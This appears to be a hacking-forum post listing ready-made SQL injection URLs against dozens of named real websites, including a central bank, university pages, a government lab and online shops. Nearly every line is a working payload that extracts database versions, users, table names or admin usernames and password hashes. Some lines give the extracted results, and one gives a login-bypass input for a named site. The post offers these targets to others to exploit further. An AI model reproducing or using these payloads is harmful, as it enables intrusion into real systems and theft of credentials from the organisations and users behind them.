Continuing the aviation theme: now a site that sells airplanes. Code: http://www.businessair.ru/info/news.php?id=-375+union+select+1,user(),3,4,5,6+--+
http://skydot.lanl.gov uses SQL queries to retrieve data (more precisely, only select)... http://skydot.lanl.gov/nsvs/nsvs.php no comment...
http://teh-rezina.ru/?id=999+union+select+1,user(),version(),4,5,6 5.0.51a-24+lenny1 trezina@localhost ---------- http://oleg-stecenko.biz.ua/index.php?show=product&cat=135&im=&par3=&par4=&par2=&pid=-1+union+select+1,2,3,4,5,6,7,8,version(),10,user(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 oleg@localhost:5.0.24
Bank of Afghanistan Code: http://www.centralbank.gov.af/CompleteNewsDescription.php?NewsId=-13+union+ALL+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5-- --- Version: 5.0.91-community Database: cbank_dabwebsite User: cbank_root@localhost --- P.S. ..they're already on their way for me.. heh
Code: http://www.moodiereport.com/category.php?id=-31+union+select+1,2,3,GROUP_CONCAT%28concat_ws%280x3a,table_schema,TABLE_NAME%29+SEPARATOR+0x3C62723E%29,5,6,7,8,9,10,11,12,13+from+information_schema.columns+where+column_name+like+0x257061737325+or+column_name+like+0x25702577256425--+
PR 3 Code: http://www.worldnet-intl.com/services.php?id=3&&s=-9%20Union%20Select%201,database%28%29,3,4,5,6,7,8,9,10%20-- Version = 5.0.51a-24+lenny4 Database = worldnet_db User = [email protected] Code: http://www.franchisetoown.com/franchise_detail.php?id=412+and+1=0+%20Union%20Select%20%201,2,3,4,5,6,7,8,9,10,11,12,13,UNHEX%28HEX%28version%28%29%29%29,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43%20-- Version = 5.0.41-community-log User = [email protected] Database = franchi_fto
Code: http://www.pucp.edu.pe/puntoedu/index.php?option=com_categorias&cat=-30+UNION+SELECT+1,2,concat%28username,0x3a,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20jos_users%20limit%200,1-- Code: http://www.pucp.edu.pe/puntoedu/index.php?option=com_categorias&cat=-30+UNION+SELECT+1,2,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20jos_users%20limit%200,1-- Version: bd_puntoedu Database: 5.0.77 Username: ]puntoedu_user@localhost Google PR: 7 There is a second password on the admin panel...
Code: http://www.localfirstaz.com/directory/view-cat.php?id=-23+union+select+1,2,3,GROUP_CONCAT%28concat_ws%280x3a,table_schema,TABLE_NAME%29+SEPARATOR+0x3C62723E%29+from+information_schema.columns+where+column_name+like+0x257061737325+or+column_name+like+0x25702577256425--+
http://mombaby.med.unc.edu/index.php?c=2&s=58&p=-333+union/*ii*/select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9+from+information_schema.columns-- http://www.corpusgallery.com/exhibitions.php?id=-21'+union+select+1,2,3,version(),5,6,7/*
http://www.digitalcarversguild.com/plugin.php?ProductId=-18+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- http://www.maverickentertainment.cc/filmdetail.php?ProductID=724+and+ascii(lower(substring(user(),1,1)))=109 http://www.eonclash.com/ViewProduct.php?ProductID=-26+union+select+1,2,concat(username,char(58),user_password),4,5,6,7,8+from+users
PR5 http://www.rtuni.org/extendedschools/page.php?page_id=-1+union+select+1,2,3,4,5,6,7,version(),9-- Database Version: 5.0.90-community Database name: bbritton_rtu User name: bbritton_root@localhost
http://www.positivenetworks.com/page.php?pageID=3'+or+(1,1)=(select+count(0),concat((select+table_name+from+information_schema.tables+where+table_name=(select+table_name+from+information_schema.tables+where+table_rows>ascii(lower(substring(version(),1,1)))limit+0,1)+limit+0,1),floor(rand(0)*2))from(information_schema.tables)+group+by+2)--+
Code: http://www.inab.org/?option=com_projects&Itemid=62&idProyecto=-336+UNION+SELECT+1,2,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- Version: 5.0.22-Debian_0ubuntu6.06.2-log Database: personal Username: inb@localhost Google PR: 5
http://youronesourcefitness.com/trainers.php?id=30+union+select+concat_ws(0x3a,@@version,@@version_compile_os,@@version_comment,@@version_compile_machine),2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2 http://www.limelight-software.com/article.php?id=-59+union+select+1,2,aes_decrypt(aes_encrypt(version(),1),1),4,5,6,7 http://www.yangdentalgroup.net/nl/article.php?id=1512;select+version()::int,null,null,null,null,null,null,null,null,null,null,null,null,null,null&type=col http://www.unitedpurpose.org/archive/article.php?id=100+union+select+1,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13+from+information_schema.`tables`+where+table_schema=database() http://www.duesseldorf.feg.de/static/sebalu2/article.php?id=-48+union+select+1,2,3,4,5,6,7,8,9 http://www.israel-diaspora.info/article.php?id=-853+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13 http://www.eleganthomesinwesttoronto.com/ShowResources.cfm?Pageid=(select+top+1+table_name+from+information_schema.tables)&TypeOfPage=2 http://www.musicforpercussion.com/php/NewsDetail.php?ID=-130+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14-- http://www.odessachamber.com/newsdetail.php?id=14'+or+(1,1)=(select+count(0),concat((select+version()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)+group+by+2)--+ http://www.dkggroup.com/newsdetail.php?id=165+or+(1,1)=(select+count(0),concat((select+version()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)+group+by+2)--+ http://www.tango04.com/news/newsdetail.php?id=-361+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13 http://www.dutchtub.com/english00/newsdetail.php?id=-207+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34&titel=eco_gadget_of_the_year! 
http://www.marmoon.com/games.php?id=-437+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13 http://www.dakamericas.com/newsdetail.php?id=19'+or+(1,1)=(select+count(0),concat((select+version()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)+group+by+2)--+ http://www.bathfringe.co.uk/page.php?pageid=38+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31&PHPSESSID='2ebe0d1ced95240449e5f9ec7bb9219c
Code: http://www.iccu.sbn.it/genera.jsp?id=-1+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by++concat(mid(version(),1,63),+floor(rand(0)*2)))--+ PR - 7 P.S. Anyone who isn't too lazy can take it further ;-) A small image hosting site Code: http://pixca.ru/login.php SQL injection in the POST data. The query logic is SELECT * FROM ??? WHERE (login = '#login#') and (password = '#password#'). You can log in as any user :D l: #login#') or 1=1# p: put smth here
http://www.eonclash.com/ViewProduct.php?ProductID=27+and+substring(version(),1,1)=4 http://www.rdmarket.ru/index.php?productID=1492'+or+(1,1)=(select+count(0),concat((select+version()+from+information_schema.tables+limit+17,1),floor(rand(0)*2))from(information_schema.tables)+group+by+2)--+ http://stroymag.kiev.ua/index.php?productID=342+or+(1,1)=(select+count(0),concat((select+version()+from+information_schema.columns+limit+0,1),floor(rand(0)*2))from(information_schema.tables)+group+by+2)--+ http://www.vk4ajj.com/cubecart/index.php?_a=viewProd&productId=342+or+(1,1)=(select+count(0),concat((select+password+from+CubeCart_admin_users+limit+0,1),floor(rand(0)*2))from(information_schema.tables)+group+by+2)--+ (http://www.vk4ajj.com/cubecart/modules/3rdparty/Estelles_Mod_Store/css/php.ini) http://www.eventphotocards.com/index.php?_a=viewProd&productId=342+or+(1,1)=(select+count(0),concat((select+version()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)+group+by+2)--+
Shop http://www.fitshop.de/de/kategorie/riegel/18/index.html?br[0]=4+and+row(1,2)in(select+count(*),concat((select+concat(table_name,0x3a,column_name)+from+information_schema.columns+where+column_name+like+0x257061737325+limit+1,1),0x3a,floor(rand(0)*2))as+a+from+information_schema.columns+x+group+by+a) Script: /de/kategorie/riegel/18/index.html? http://fitshop.de/sqladmin/ The hashes are in the neighboring section.
Continuing with the shops http://www.gskpiter.ru/index.php?productID=36+or+(1,1)=(select+count(0),concat((select+version()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)+group+by+2)--+